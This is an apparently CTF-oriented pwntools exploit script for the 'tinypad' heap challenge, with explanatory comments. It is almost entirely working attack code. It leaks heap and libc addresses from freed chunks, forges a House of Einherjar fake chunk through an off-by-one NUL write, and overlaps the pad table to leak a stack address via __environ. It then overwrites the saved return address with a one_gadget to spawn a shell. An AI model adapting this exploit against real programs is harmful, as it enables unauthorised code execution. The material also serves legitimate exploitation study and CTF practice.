| from pwn import * context.log_level = 'debug' import binascii
# --- Target and runtime environment -------------------------------------
# Every hard-coded offset in this script (the 0x39bb78 subtracted from the
# libc leak, the 0x3f3d6 one_gadget, the __environ symbol lookup) is tied to
# this exact libc-2.23 image.  The binary is started through a matching
# dynamic loader with that libc forced in via LD_PRELOAD, so the loader and
# the preloaded libc must come from the same glibc build.
libc_file_name = '/home/pandaos/Projects/pwn/glibc/2.23/64/lib/libc-2.23.so'
ld_file_name = '/home/pandaos/Projects/pwn/glibc/buu/ubuntu16/ld-linux-x86-64.so.2'
bin_file = './tinypad'

# ELF views: `libc` is used later for symbol lookups, `elf` is kept for
# interactive use (it is not read anywhere else in this script).
libc = ELF(libc_file_name)
elf = ELF(bin_file)

# Spawn the target: ld.so is argv[0], the binary is its argument.
target_env = {"LD_PRELOAD": libc_file_name}
p = process([ld_file_name, bin_file], env=target_env)
def Add(size, content):
    """Drive tinypad's 'A' (add) command.

    Answers the three prompts in order: command, requested size, content.
    Everything goes through sendline, so a newline is appended to `content`;
    how many bytes the target actually consumes is up to the target.
    """
    steps = [
        ('(CMD)>>> ', 'A'),
        ('(SIZE)>>> ', str(size)),
        ('(CONTENT)>>> ', content),
    ]
    for prompt, payload in steps:
        p.sendlineafter(prompt, payload)
def Edit(index, content):
    """Drive tinypad's 'E' (edit) command for pad slot `index`.

    Answers command, index and new content, then confirms the edit with
    'Y' at the (Y/n) prompt.
    """
    steps = [
        ('(CMD)>>> ', 'E'),
        ('(INDEX)>>> ', str(index)),
        ('(CONTENT)>>> ', content),
        ('(Y/n)>>> ', 'Y'),
    ]
    for prompt, payload in steps:
        p.sendlineafter(prompt, payload)
def Del(index):
    """Drive tinypad's 'D' (delete) command for pad slot `index`."""
    steps = (('(CMD)>>> ', 'D'), ('(INDEX)>>> ', str(index)))
    for prompt, payload in steps:
        p.sendlineafter(prompt, payload)
def Exit():
    """Send tinypad's 'Q' command (the exploit relies on the return path
    this takes; see the final stage below)."""
    prompt, cmd = '(CMD)>>> ', 'Q'
    p.sendlineafter(prompt, cmd)
# --- Heap layout ---------------------------------------------------------
# Four pads, presumably filling slots 1..4 in order.  The 0x90 requests
# become 0xa0-byte chunks (the later `+ 0xa0` stride relies on that), which
# are above fastbin size, so freeing them puts them in the unsorted bin.
# NOTE(review): slot 4 is given 0xff bytes for a 0xf0-byte pad; the target
# presumably reads only `size` bytes and the surplus stays in the pipe to be
# eaten by the next prompt read.  Trim it to 0xf0 if the dialogue ever
# desynchronises.
layout = [
    (0x90, 'A' * 0x80),
    (0x100, 'B' * 0x80),
    (0x90, 'B' * 0x80),
    (0xf0, b'\xCC' * (0x100 - 1)),
]
for size, content in layout:
    Add(size, content)

# Free slot 3, then slot 1.  Slot 2 sits between them, so neither free
# consolidates; both chunks keep their fd/bk pointers for the leak below.
for victim in (3, 1):
    Del(victim)
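# --- Leaks -------------------------------------------------------------
# The pad listing still prints deleted pads, so the dump shows the freed
# chunks' fd pointers.  Slot 1 was freed last, so its fd presumably points
# at the other freed chunk (slot 3): a heap address.
p.recvuntil('INDEX: 1\n # CONTENT: ')
leak_raw_heap = u64(p.recvn(6) + b'\x00\x00')
print("leak raw heap: ", hex(leak_raw_heap))

# Slot 3's fd points back into main_arena (the unsorted-bin head), hence
# the libc leak.  0x39bb78 is that pointer's offset in the preloaded
# libc-2.23 build and must be re-derived for any other libc.
p.recvuntil('INDEX: 3\n # CONTENT: ')
leak_raw_libc = u64(p.recvn(6) + b'\x00\x00')
libc_base = leak_raw_libc - 0x39bb78
print("libc base: ", hex(libc_base))

# Sanity-check the leaks before building on them: a malloc chunk address is
# 16-byte aligned and a libc mapping is page aligned.  A mismatched libc
# (wrong 0x39bb78) or a desynchronised read fails here with a clear message
# instead of as an unexplained crash several steps later.
if leak_raw_heap & 0xf or libc_base & 0xfff:
    raise RuntimeError(
        "implausible leak: heap=%#x libc_base=%#x" % (leak_raw_heap, libc_base)
    )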
# --- House of Einherjar setup -------------------------------------------
# The fake chunk lives at 0x602040 in the binary's static data (presumably
# tinypad's staging buffer, which is why it is written via Edit below).
# Its size is chosen so that fake_chunk_addr + tsize lands exactly on
# slot 4's chunk header: leak_raw_heap is slot 3's chunk, 0xa0 bytes long.
fake_chunk_addr = 0x602040
tsize = leak_raw_heap + 0xa0 - fake_chunk_addr
print("fake size: ", hex(tsize))

# prev_size = 0, size = tsize | PREV_INUSE, then fd, bk, fd_nextsize and
# bk_nextsize all pointing at the fake chunk itself so that unlink()'s
# `fd->bk == p && bk->fd == p` check is satisfied.
fake_chunk = b''.join([
    p64(0),
    p64(tsize + 1),
    p64(fake_chunk_addr),
    p64(fake_chunk_addr),
    p64(fake_chunk_addr),
    p64(fake_chunk_addr),
])

# Re-take the first free slot (presumably handed slot 3's old chunk, the
# one directly below slot 4).  0x90 filler + tsize is exactly 0x98 bytes:
# the last 8 bytes overwrite slot 4's prev_size, and the NUL the program
# appends (the off-by-one being exploited) presumably lands on slot 4's
# size byte, clearing PREV_INUSE.
Add(0x98, b'\x11' * 0x90 + p64(tsize))
# Re-take the other free slot so the table is back to four pads.
Add(0x98, b'\x22' * 0x97)
# Stage the fake chunk header into the static buffer at fake_chunk_addr.
Edit(3, fake_chunk)
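# Debugging hook, now opt-in.  Run as `python exploit.py GDB` (pwntools
# `args`) to get the original behaviour of attaching gdb and pausing here;
# the unconditional attach + input() blocked every non-interactive run and
# required gdb to be installed.
if args.GDB:
    gdb.attach(p)
    input('>')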
# --- Trigger the backward consolidation ----------------------------------
# Freeing slot 4 (PREV_INUSE cleared, prev_size = tsize) makes free() merge
# it backwards into the fake chunk at fake_chunk_addr.  Slot 3 is freed as
# well, presumably so that two slots are empty for the two Adds that follow.
for victim in (4, 3):
    Del(victim)

# First allocation after the merge: carves a 0xf0 chunk at fake_chunk_addr,
# i.e. inside the binary's static data.
Add(0xe0, 'A' * 0x20)
# --- Overlap the pad table and leak the stack ----------------------------
# Second allocation from the merged region: its user data presumably
# overlaps the pad table that follows the static buffer, so these 16 bytes
# become slot 1's (size, pointer) entry.  The size is junk; the pointer is
# aimed at libc's __environ.
fake_pad = b''.join([
    p64(0xAABBCCDD11223344),
    p64(libc_base + libc.symbols['__environ']),
])
Add(0xe0, fake_pad)

# The listing now prints the memory behind slot 1's pointer, i.e. the value
# of __environ: a stack address.
p.recvuntil('INDEX: 1\n # CONTENT: ')
leak_stack = u64(p.recvn(6) + b'\x00\x00')
print("leak stack: ", hex(leak_stack))

# Re-point slot 1 at the stack slot the final stage overwrites (presumably
# main's saved return address).  The 0xe8 distance from the environ pointer
# is specific to this binary, loader and environment — re-derive it in gdb
# if the stack layout changes.
ret_slot = leak_stack - 0xe8
Edit(4, b'AAAAAAAA' + p64(ret_slot))
# --- Hijack control flow -------------------------------------------------
# 0x3f3d6 is a one_gadget offset for the preloaded libc-2.23 build.  Every
# one_gadget comes with register/stack constraints, so re-check it with the
# one_gadget tool if the libc or the stack state at return changes.
one_gadget = libc_base + 0x3f3d6
Edit(1, p64(one_gadget))   # slot 1's pointer now targets the return slot
Exit()                     # leaving the menu returns into the gadget
p.interactive()